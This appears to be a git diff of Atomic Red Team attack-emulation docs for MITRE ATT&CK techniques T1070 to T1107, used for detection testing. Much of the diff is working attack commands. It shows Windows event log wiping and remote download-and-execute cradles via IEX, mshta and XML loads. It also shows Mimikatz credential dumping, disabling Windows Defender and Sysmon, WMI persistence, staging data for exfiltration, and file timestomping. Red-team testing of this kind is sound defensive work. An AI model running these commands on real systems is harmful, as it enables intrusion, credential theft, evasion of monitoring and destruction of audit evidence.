**Supported Platforms:** Windows
diff --git a/Atomic_Threat_Coverage/Triggers/T1070.md b/Atomic_Threat_Coverage/Triggers/T1070.md
index f399875..e436fef 100644
--- a/Atomic_Threat_Coverage/Triggers/T1070.md
+++ b/Atomic_Threat_Coverage/Triggers/T1070.md
@@ -38,7 +38,7 @@ Logs may also be cleared through other mechanisms, such as [PowerShell](https://
## Atomic Test #1 - Clear Logs
-Upon execution this test will clear Windows Event Logs
+Upon execution this test will clear Windows Event Logs. Open the System.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty.
**Supported Platforms:** Windows
@@ -67,7 +67,8 @@ wevtutil cl #{log_name}
## Atomic Test #2 - FSUtil
-Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume.
+Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume. Upon exectuion, no output
+will be displayed. More information about fsutil can be found at https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn
**Supported Platforms:** Windows
@@ -82,6 +83,10 @@ Manages the update sequence number (USN) change journal, which provides a persis
fsutil usn deletejournal /D C:
```
+#### Cleanup Commands:
+```cmd
+fsutil usn createjournal m=1000 a=100 c:
+```
@@ -174,7 +179,9 @@ echo 0> #{log_path}
## Atomic Test #6 - Delete System Logs Using PowerShell
-Recommended Detection: Monitor for use of the windows event log filepath in PowerShell couple with delete arguments
+Recommended Detection: Monitor for use of the windows event log filepath in PowerShell couple with delete arguments.
+Upon execution, open the Security.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty or has very few logs in it.
+When this service get's stopped, it is automatically restarted and the Security.evtx folder re-created.
**Supported Platforms:** Windows
@@ -204,7 +211,8 @@ Start-Service -Name EventLog
## Atomic Test #7 - Delete System Logs Using Clear-EventLogId
-Clear event logs using built-in PowerShell commands
+Clear event logs using built-in PowerShell commands.
+Upon execution, open the Security.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty or has very few logs in it.
**Supported Platforms:** Windows
diff --git a/Atomic_Threat_Coverage/Triggers/T1073.md b/Atomic_Threat_Coverage/Triggers/T1073.md
index 7d5becc..0d52623 100644
--- a/Atomic_Threat_Coverage/Triggers/T1073.md
+++ b/Atomic_Threat_Coverage/Triggers/T1073.md
@@ -12,7 +12,8 @@ Adversaries likely use this technique as a means of masking actions they perform
## Atomic Test #1 - DLL Side-Loading using the Notepad++ GUP.exe binary
-GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded
+GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded.
+Upon execution, calc.exe will be opened.
**Supported Platforms:** Windows
@@ -23,13 +24,14 @@ GUP is an open source signed binary used by Notepad++ for software updates, and
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| process_name | Name of the created process | string | calculator.exe|
+| gup_executable | GUP is an open source signed binary used by Notepad++ for software updates | path | PathToAtomicsFolder\T1073\bin\GUP.exe|
#### Attack Commands: Run with `command_prompt`!
```cmd
-$PathToAtomicsFolder\T1073\bin\GUP.exe
+#{gup_executable}
```
#### Cleanup Commands:
@@ -39,6 +41,19 @@ taskkill /F /IM #{process_name}
+#### Dependencies: Run with `powershell`!
+##### Description: Gup.exe binary must exist on disk at specified location (#{gup_executable})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{gup_executable}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1073/bin/GUP.exe" -OutFile "#{gup_executable}"
+```
+
+
diff --git a/Atomic_Threat_Coverage/Triggers/T1074.md b/Atomic_Threat_Coverage/Triggers/T1074.md
index f1d4dfa..013cd8d 100644
--- a/Atomic_Threat_Coverage/Triggers/T1074.md
+++ b/Atomic_Threat_Coverage/Triggers/T1074.md
@@ -16,21 +16,31 @@ Interactive command shells may be used, and common functionality within [cmd](ht
## Atomic Test #1 - Stage data from Discovery.bat
-Utilize powershell to download discovery.bat and save to a local file
+Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution,
+verify that the file is saved in the temp directory.
**Supported Platforms:** Windows
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| output_file | Location to save downloaded discovery.bat file | Path | $env:TEMP\discovery.bat|
+
#### Attack Commands: Run with `powershell`!
```powershell
-IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat') > pi.log
+Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat" -OutFile #{output_file}
```
+#### Cleanup Commands:
+```powershell
+Remove-Item -Force #{output_file} -ErrorAction Ignore
+```
@@ -64,24 +74,31 @@ curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ato
## Atomic Test #3 - Zip a Folder with PowerShell for Staging in Temp
-Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration.
+Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip
+was placed in the temp directory.
**Supported Platforms:** Windows
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| input_file | Location of file or folder to zip | Path | PathToAtomicsFolder\T1074\bin\Folder_to_zip|
+| output_file | Location to save zipped file or folder | Path | $env:TEMP\Folder_to_zip.zip|
+
#### Attack Commands: Run with `powershell`!
```powershell
-Compress-Archive -Path $PathToAtomicsFolder\T1074\bin\Folder_to_zip -DestinationPath $env:TEMP\Folder_to_zip.zip
+Compress-Archive -Path #{input_file} -DestinationPath #{output_file} -Force
```
#### Cleanup Commands:
```powershell
-Remove-Item -Path $env:TEMP\Folder_to_zip.zip -ErrorAction Ignore
+Remove-Item -Path #{output_file} -ErrorAction Ignore
```
diff --git a/Atomic_Threat_Coverage/Triggers/T1083.md b/Atomic_Threat_Coverage/Triggers/T1083.md
index 8a89d44..a7cd04e 100644
--- a/Atomic_Threat_Coverage/Triggers/T1083.md
+++ b/Atomic_Threat_Coverage/Triggers/T1083.md
@@ -24,7 +24,8 @@ In Mac and Linux, this kind of discovery is accomplished with the ls
## Atomic Test #1 - File and Directory Discovery (cmd.exe)
-Find or discover files on the file system
+Find or discover files on the file system. Upon execution, the file "download" will be placed in the temporary folder and contain the output of
+all of the data discovery commands.
**Supported Platforms:** Windows
@@ -39,7 +40,6 @@ Find or discover files on the file system
dir /s c:\ >> %temp%\download
dir /s "c:\Documents and Settings" >> %temp%\download
dir /s "c:\Program Files\" >> %temp%\download
-dir /s d:\ >> %temp%\download
dir "%systemdrive%\Users\*.*" >> %temp%\download
dir "%userprofile%\AppData\Roaming\Microsoft\Windows\Recent\*.*" >> %temp%\download
dir "%userprofile%\Desktop\*.*" >> %temp%\download
@@ -55,7 +55,7 @@ tree /F >> %temp%\download
## Atomic Test #2 - File and Directory Discovery (PowerShell)
-Find or discover files on the file system
+Find or discover files on the file system. Upon execution, file and folder information will be displayed.
**Supported Platforms:** Windows
diff --git a/Atomic_Threat_Coverage/Triggers/T1084.md b/Atomic_Threat_Coverage/Triggers/T1084.md
index 6f555bf..9d6fd38 100644
--- a/Atomic_Threat_Coverage/Triggers/T1084.md
+++ b/Atomic_Threat_Coverage/Triggers/T1084.md
@@ -4,15 +4,14 @@
## Atomic Tests
-- [Atomic Test #1 - Persistence](#atomic-test-1---persistence)
+- [Atomic Test #1 - Persistence via WMI Event Subscription](#atomic-test-1---persistence-via-wmi-event-subscription)
-## Atomic Test #1 - Persistence
-Run from an administrator powershell window
-
-After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
+## Atomic Test #1 - Persistence via WMI Event Subscription
+Run from an administrator powershell window. After running, reboot the victim machine.
+After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
Code references
@@ -52,7 +51,6 @@ $FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassNa
$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue
-
$FilterConsumerBindingToCleanup | Remove-WmiObject
$EventConsumerToCleanup | Remove-WmiObject
$EventFilterToCleanup | Remove-WmiObject
diff --git a/Atomic_Threat_Coverage/Triggers/T1085.md b/Atomic_Threat_Coverage/Triggers/T1085.md
index 3c49523..7997325 100644
--- a/Atomic_Threat_Coverage/Triggers/T1085.md
+++ b/Atomic_Threat_Coverage/Triggers/T1085.md
@@ -24,7 +24,7 @@ Rundll32 can also been used to execute scripts such as JavaScript. This can be d
## Atomic Test #1 - Rundll32 execute JavaScript Remote Payload With GetObject
-Test execution of a remote script using rundll32.exe
+Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened.
**Supported Platforms:** Windows
@@ -129,6 +129,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #4 - Rundll32 ieadvpack.dll Execution
Test execution of a command using rundll32.exe with ieadvpack.dll.
+Upon execution calc.exe will be launched
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Ieadvpack.yml
@@ -172,7 +173,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #5 - Rundll32 syssetup.dll Execution
-Test execution of a command using rundll32.exe with syssetup.dll.
+Test execution of a command using rundll32.exe with syssetup.dll. Upon execution, a window saying "installation failed" will be opened
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Syssetup.yml
@@ -216,7 +217,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #6 - Rundll32 setupapi.dll Execution
-Test execution of a command using rundll32.exe with setupapi.dll.
+Test execution of a command using rundll32.exe with setupapi.dll. Upon execution, a windows saying "installation failed" will be opened
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Setupapi.yml
diff --git a/Atomic_Threat_Coverage/Triggers/T1086.md b/Atomic_Threat_Coverage/Triggers/T1086.md
index 4bfaefc..5366ecf 100644
--- a/Atomic_Threat_Coverage/Triggers/T1086.md
+++ b/Atomic_Threat_Coverage/Triggers/T1086.md
@@ -22,29 +22,27 @@ PowerShell commands/scripts can also be executed without directly invoking the p
- [Atomic Test #5 - Invoke-AppPathBypass](#atomic-test-5---invoke-apppathbypass)
-- [Atomic Test #6 - PowerShell Add User](#atomic-test-6---powershell-add-user)
+- [Atomic Test #6 - Powershell MsXml COM object - no prompt](#atomic-test-6---powershell-msxml-com-object---no-prompt)
-- [Atomic Test #7 - Powershell MsXml COM object - no prompt](#atomic-test-7---powershell-msxml-com-object---no-prompt)
+- [Atomic Test #7 - Powershell MsXml COM object - with prompt](#atomic-test-7---powershell-msxml-com-object---with-prompt)
-- [Atomic Test #8 - Powershell MsXml COM object - with prompt](#atomic-test-8---powershell-msxml-com-object---with-prompt)
+- [Atomic Test #8 - Powershell XML requests](#atomic-test-8---powershell-xml-requests)
-- [Atomic Test #9 - Powershell XML requests](#atomic-test-9---powershell-xml-requests)
+- [Atomic Test #9 - Powershell invoke mshta.exe download](#atomic-test-9---powershell-invoke-mshtaexe-download)
-- [Atomic Test #10 - Powershell invoke mshta.exe download](#atomic-test-10---powershell-invoke-mshtaexe-download)
+- [Atomic Test #10 - Powershell Invoke-DownloadCradle](#atomic-test-10---powershell-invoke-downloadcradle)
-- [Atomic Test #11 - Powershell Invoke-DownloadCradle](#atomic-test-11---powershell-invoke-downloadcradle)
+- [Atomic Test #11 - PowerShell Fileless Script Execution](#atomic-test-11---powershell-fileless-script-execution)
-- [Atomic Test #12 - PowerShell Fileless Script Execution](#atomic-test-12---powershell-fileless-script-execution)
+- [Atomic Test #12 - PowerShell Downgrade Attack](#atomic-test-12---powershell-downgrade-attack)
-- [Atomic Test #13 - PowerShell Downgrade Attack](#atomic-test-13---powershell-downgrade-attack)
-
-- [Atomic Test #14 - NTFS Alternate Data Stream Access](#atomic-test-14---ntfs-alternate-data-stream-access)
+- [Atomic Test #13 - NTFS Alternate Data Stream Access](#atomic-test-13---ntfs-alternate-data-stream-access)
## Atomic Test #1 - Mimikatz
-Download Mimikatz and dump credentials
+Download Mimikatz and dump credentials. Upon execution, mimikatz dump details and password hashes will be displayed.
**Supported Platforms:** Windows
@@ -75,7 +73,7 @@ powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invo
## Atomic Test #2 - BloodHound
Upon execution BloodHound will be downloaded and executed. It will set up collection methods, run,
-and then compress and store the data to the temp directory on the machine
+and then compress and store the data to the temp directory on the machine
**Supported Platforms:** Windows
@@ -88,13 +86,17 @@ and then compress and store the data to the temp directory on the machine
| bloodurl | BloodHound URL | url | https://raw.githubusercontent.com/BloodHoundAD/BloodHound/a7ea5363870d925bc31d3a441a361f38b0aadd0b/Ingestors/SharpHound.ps1|
-#### Attack Commands: Run with `command_prompt`!
+#### Attack Commands: Run with `powershell`!
-```cmd
-powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound"
+```powershell
+IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound
```
+#### Cleanup Commands:
+```powershell
+Remove-Item $env:temp\*BloodHound.zip -Force
+```
@@ -131,7 +133,7 @@ Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set
## Atomic Test #4 - Mimikatz - Cradlecraft PsSendKeys
-Run mimikatz via PsSendKeys
+Run mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed.
**Supported Platforms:** Windows
@@ -180,39 +182,7 @@ Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githu
-## Atomic Test #6 - PowerShell Add User
-Using PS 5.1, add a user via CLI
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| user_name | username to add | string | atomic_user|
-| full_name | Full name of user | string | Atomic Red Team|
-| password | password to use | string | ATOM1CR3DT3@M|
-| description | Brief description of account | string | Atomic Things|
-
-
-#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
-
-
-```powershell
-New-LocalUser -FullName '#{full_name}' -Name '#{user_name}' -Password #{password} -Description '#{description}'
-```
-
-
-
-
-
-
-
-
-
-## Atomic Test #7 - Powershell MsXml COM object - no prompt
+## Atomic Test #6 - Powershell MsXml COM object - no prompt
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell MsXml COM object.
Not proxy aware removing cache although does not appear to write to those locations
@@ -243,10 +213,10 @@ powershell.exe IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Ob
-## Atomic Test #8 - Powershell MsXml COM object - with prompt
-Provided by https://github.com/mgreen27/mgreen27.github.io
-Powershell MsXml COM object.
-Not proxy aware removing cache although does not appear to write to those locations
+## Atomic Test #7 - Powershell MsXml COM object - with prompt
+Powershell MsXml COM object. Not proxy aware, removing cache although does not appear to write to those locations. Upon execution, "Download Cradle test success!" will be displayed.
+
+Provided by https://github.com/mgreen27/mgreen27.github.i
**Supported Platforms:** Windows
@@ -274,9 +244,10 @@ powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.S
-## Atomic Test #9 - Powershell XML requests
+## Atomic Test #8 - Powershell XML requests
+Powershell xml download request. Upon execution, "Download Cradle test success!" will be dispalyed.
+
Provided by https://github.com/mgreen27/mgreen27.github.io
-Powershell xml download request
**Supported Platforms:** Windows
@@ -293,7 +264,7 @@ Powershell xml download request
```cmd
-"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
+"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
```
@@ -304,9 +275,10 @@ Powershell xml download request
-## Atomic Test #10 - Powershell invoke mshta.exe download
+## Atomic Test #9 - Powershell invoke mshta.exe download
+Powershell invoke mshta to download payload. Upon execution, a new PowerShell window will be opened which will display "Download Cradle test success!".
+
Provided by https://github.com/mgreen27/mgreen27.github.io
-Powershell invoke mshta to download payload
**Supported Platforms:** Windows
@@ -319,11 +291,11 @@ Powershell invoke mshta to download payload
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/mshta.sct|
-#### Attack Commands: Run with `powershell`!
+#### Attack Commands: Run with `command_prompt`!
-```powershell
-"C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
+```cmd
+C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
```
@@ -334,7 +306,7 @@ Powershell invoke mshta to download payload
-## Atomic Test #11 - Powershell Invoke-DownloadCradle
+## Atomic Test #10 - Powershell Invoke-DownloadCradle
Provided by https://github.com/mgreen27/mgreen27.github.io
Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
@@ -356,8 +328,9 @@ Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
-## Atomic Test #12 - PowerShell Fileless Script Execution
-Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections.
+## Atomic Test #11 - PowerShell Fileless Script Execution
+Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections. Upon exection, open "C:\Windows\Temp" and verify that
+art-marker.txt is in the folder.
**Supported Platforms:** Windows
@@ -365,7 +338,7 @@ Execution of a PowerShell payload from the Windows Registry similar to that seen
-#### Attack Commands: Run with `powershell`!
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
@@ -387,7 +360,7 @@ cmd /c REG DELETE "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /f
-## Atomic Test #13 - PowerShell Downgrade Attack
+## Atomic Test #12 - PowerShell Downgrade Attack
Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/
**Supported Platforms:** Windows
@@ -423,8 +396,8 @@ Write-Host Automated installer not implemented yet, please install PowerShell v
-## Atomic Test #14 - NTFS Alternate Data Stream Access
-Creates a file with an alternate data stream and simulates executing that hidden code/file
+## Atomic Test #13 - NTFS Alternate Data Stream Access
+Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, "Stream Data Executed" will be displayed.
**Supported Platforms:** Windows
diff --git a/Atomic_Threat_Coverage/Triggers/T1087.md b/Atomic_Threat_Coverage/Triggers/T1087.md
index 438beec..e1bd20f 100644
--- a/Atomic_Threat_Coverage/Triggers/T1087.md
+++ b/Atomic_Threat_Coverage/Triggers/T1087.md
@@ -165,7 +165,7 @@ username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username
## Atomic Test #5 - Show if a user account has ever logged in remotely
Show if a user account has ever logged in remotely
-**Supported Platforms:** Linux, macOS
+**Supported Platforms:** Linux
diff --git a/Atomic_Threat_Coverage/Triggers/T1089.md b/Atomic_Threat_Coverage/Triggers/T1089.md
index 463a6a1..ecc2f17 100644
--- a/Atomic_Threat_Coverage/Triggers/T1089.md
+++ b/Atomic_Threat_Coverage/Triggers/T1089.md
@@ -239,7 +239,8 @@ sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfig
## Atomic Test #8 - Unload Sysmon Filter Driver
-Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service.
+Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution, o verify successful execution,
+run the prereq_command's and it should fail with an error of "sysmon filter must be loaded".
**Supported Platforms:** Windows
@@ -261,22 +262,45 @@ fltmc.exe unload #{sysmon_driver}
#### Cleanup Commands:
```cmd
-sc stop sysmon
-fltmc.exe load #{sysmon_driver}
-sc start sysmon
+sysmon -u -i > nul 2>&1
+sysmon -i -accepteula -i > nul 2>&1
+%temp%\Sysmon\sysmon.exe -u > nul 2>&1
+%temp%\Sysmon\sysmon.exe -accepteula -i > nul 2>&1
```
-#### Dependencies: Run with `command_prompt`!
-##### Description: Sysmon filter must be loaded
+#### Dependencies: Run with `powershell`!
+##### Description: Sysmon must be downloaded
##### Check Prereq Commands:
-```cmd
-fltmc.exe filters | findstr #{sysmon_driver}
+```powershell
+if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") -or (Test-Path $env:Temp\Sysmon\Sysmon.exe)) { exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
-```cmd
-echo Automated installer not implemented yet, please install Sysmon manually
+```powershell
+Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$env:TEMP\Sysmon.zip"
+Expand-Archive $env:TEMP\Sysmon.zip $env:TEMP\Sysmon -Force
+Remove-Item $env:TEMP\Sysmon.zip -Force
+```
+##### Description: sysmon must be Installed
+##### Check Prereq Commands:
+```powershell
+if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+if(cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") { C:\Windows\Sysmon.exe -accepteula -i } else
+{ Set-Location $env:TEMP\Sysmon\; .\Sysmon.exe -accepteula -i}
+```
+##### Description: sysmon filter must be loaded
+##### Check Prereq Commands:
+```powershell
+if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0 } else { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+sysmon -u
+sysmon -accepteula -i
```
@@ -533,7 +557,8 @@ Credit to Matt Graeber (@mattifestation) for the research.
## Atomic Test #16 - Tamper with Windows Defender ATP PowerShell
-Attempting to disable scheduled scanning and other parts of windows defender atp
+Attempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat Protection will show as disabled
+in Windows settings.
**Supported Platforms:** Windows
@@ -567,7 +592,8 @@ Set-MpPreference -DisableBlockAtFirstSeen 0
## Atomic Test #17 - Tamper with Windows Defender Command Prompt
-Attempting to disable scheduled scanning and other parts of windows defender atp
+Attempting to disable scheduled scanning and other parts of windows defender atp. These commands must be run as System, so they still fail as administrator.
+However, adversaries do attempt to perform this action so monitoring for these command lines can help alert to other bad things going on.
**Supported Platforms:** Windows
@@ -598,7 +624,8 @@ sc config WinDefend start=enabled
## Atomic Test #18 - Tamper with Windows Defender Registry
-Disable Windows Defender from starting after a reboot
+Disable Windows Defender from starting after a reboot. Upen execution, if the computer is rebooted the entire Virus and Threat protection window in Settings will be
+grayed out and have no info.
**Supported Platforms:** Windows
@@ -626,7 +653,10 @@ Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name Disa
## Atomic Test #19 - Disable Microft Office Security Features
-Gorgon group may disable Office security features so that their code can run
+Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will not
+show any warning before editing the document
+
+
https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
**Supported Platforms:** Windows
@@ -662,8 +692,10 @@ Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\Protected
## Atomic Test #20 - Remove Windows Defender Definition Files
-Removing definition files would cause ATP to not fire for AntiMalware
-Check MpCmdRun.exe man page for info on all arguments
+Removing definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all arguments.
+On later viersions of windows (1909+) this command fails even with admin due to inusfficient privelages. On older versions of windows the
+command will say completed.
+
https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
**Supported Platforms:** Windows
diff --git a/Atomic_Threat_Coverage/Triggers/T1099.md b/Atomic_Threat_Coverage/Triggers/T1099.md
index b823637..51d1594 100644
--- a/Atomic_Threat_Coverage/Triggers/T1099.md
+++ b/Atomic_Threat_Coverage/Triggers/T1099.md
@@ -148,9 +148,8 @@ touch -acmr #{reference_file_path} #{target_file_path}
## Atomic Test #5 - Windows - Modify file creation timestamp with PowerShell
-Modifies the file creation timestamp of a specified file.
-
-This technique was seen in use by the Stitch RAT.
+Modifies the file creation timestamp of a specified file. This technique was seen in use by the Stitch RAT.
+To verify execution, use File Explorer to view the Properties of the file and observe that the Created time is the year 1970.
**Supported Platforms:** Windows
@@ -160,7 +159,7 @@ This technique was seen in use by the Stitch RAT.
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| file_path | Path of file to change creation timestamp | Path | $env:APPDATA\atomic.txt|
+| file_path | Path of file to change creation timestamp | Path | $env:TEMP\T1099_timestomp.txt|
| target_date_time | Date/time to replace original timestamps with | String | 1970-01-01 00:00:00|
@@ -168,27 +167,37 @@ This technique was seen in use by the Stitch RAT.
```powershell
-New-Item #{file_path} -Force
-Set-Content #{file_path} -Value "atomic test" -Force
Get-ChildItem #{file_path} | % { $_.CreationTime = "#{target_date_time}" }
```
#### Cleanup Commands:
```powershell
-Remove-Item #{file_path} -Force
+Remove-Item #{file_path} -Force -ErrorAction Ignore
```
+#### Dependencies: Run with `powershell`!
+##### Description: A file must exist at the path (#{file_path}) to change the creation time on
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{file_path}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Path #{file_path} -Force | Out-Null
+Set-Content #{file_path} -Value "T1099 Timestomp" -Force | Out-Null
+```
+
+
## Atomic Test #6 - Windows - Modify file last modified timestamp with PowerShell
-Modifies the file last modified timestamp of a specified file.
-
-This technique was seen in use by the Stitch RAT.
+Modifies the file last modified timestamp of a specified file. This technique was seen in use by the Stitch RAT.
+To verify execution, use File Explorer to view the Properties of the file and observe that the Modified time is the year 1970.
**Supported Platforms:** Windows
@@ -198,7 +207,7 @@ This technique was seen in use by the Stitch RAT.
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| file_path | Path of file to change last modified timestamp | Path | $env:APPDATA\atomic.txt|
+| file_path | Path of file to change modified timestamp | Path | $env:TEMP\T1099_timestomp.txt|
| target_date_time | Date/time to replace original timestamps with | String | 1970-01-01 00:00:00|
@@ -206,27 +215,37 @@ This technique was seen in use by the Stitch RAT.
```powershell
-New-Item #{file_path} -Force
-Set-Content #{file_path} -Value "atomic test" -Force
Get-ChildItem #{file_path} | % { $_.LastWriteTime = "#{target_date_time}" }
```
#### Cleanup Commands:
```powershell
-Remove-Item #{file_path} -Force
+Remove-Item #{file_path} -Force -ErrorAction Ignore
```
+#### Dependencies: Run with `powershell`!
+##### Description: A file must exist at the path (#{file_path}) to change the modified time on
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{file_path}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Path #{file_path} -Force | Out-Null
+Set-Content #{file_path} -Value "T1099 Timestomp" -Force | Out-Null
+```
+
+
## Atomic Test #7 - Windows - Modify file last access timestamp with PowerShell
-Modifies the last access timestamp of a specified file.
-
-This technique was seen in use by the Stitch RAT.
+Modifies the last access timestamp of a specified file. This technique was seen in use by the Stitch RAT.
+To verify execution, use File Explorer to view the Properties of the file and observe that the Accessed time is the year 1970.
**Supported Platforms:** Windows
@@ -236,7 +255,7 @@ This technique was seen in use by the Stitch RAT.
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| file_path | Path of file to change last access timestamp | Path | $env:APPDATA\atomic.txt|
+| file_path | Path of file to change last access timestamp | Path | $env:TEMP\T1099_timestomp.txt|
| target_date_time | Date/time to replace original timestamps with | String | 1970-01-01 00:00:00|
@@ -244,18 +263,29 @@ This technique was seen in use by the Stitch RAT.
```powershell
-New-Item #{file_path} -Force
-Set-Content #{file_path} -Value "atomic test" -Force
Get-ChildItem #{file_path} | % { $_.LastAccessTime = "#{target_date_time}" }
```
#### Cleanup Commands:
```powershell
-Remove-Item #{file_path} -Force
+Remove-Item #{file_path} -Force -ErrorAction Ignore
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: A file must exist at the path (#{file_path}) to change the last access time on
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{file_path}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Path #{file_path} -Force | Out-Null
+Set-Content #{file_path} -Value "T1099 Timestomp" -Force | Out-Null
```
-
diff --git a/Atomic_Threat_Coverage/Triggers/T1107.md b/Atomic_Threat_Coverage/Triggers/T1107.md
index d612a34..d274f42 100644
--- a/Atomic_Threat_Coverage/Triggers/T1107.md
+++ b/Atomic_Threat_Coverage/Triggers/T1107.md
@@ -20,19 +20,11 @@ There are tools available from the host operating system to perform cleanup, but
- [Atomic Test #7 - Delete an entire folder - Windows PowerShell](#atomic-test-7---delete-an-entire-folder---windows-powershell)
-- [Atomic Test #8 - Delete VSS - vssadmin](#atomic-test-8---delete-vss---vssadmin)
+- [Atomic Test #8 - Delete Filesystem - Linux](#atomic-test-8---delete-filesystem---linux)
